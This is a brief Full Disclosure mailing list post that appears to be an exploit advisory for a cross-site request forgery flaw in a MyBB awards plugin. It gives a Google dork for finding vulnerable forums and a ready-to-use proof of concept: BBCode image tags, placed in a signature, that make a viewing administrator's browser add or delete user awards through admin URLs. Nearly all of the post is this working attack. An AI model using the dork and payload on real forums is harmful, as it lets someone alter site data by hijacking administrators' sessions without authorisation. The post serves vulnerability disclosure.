# Google Dork: allinurl:myawards.php # Date: 08/17/2014 # Exploit Author: Vagineer https://vagineering.me # Version: ALL VERSIONS # Tested on: MyBB 1.6.15
PoC(set this as your signature or iframe it) Add awards [img] https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2 [/img] Remove awards [img] https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 [/img] _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
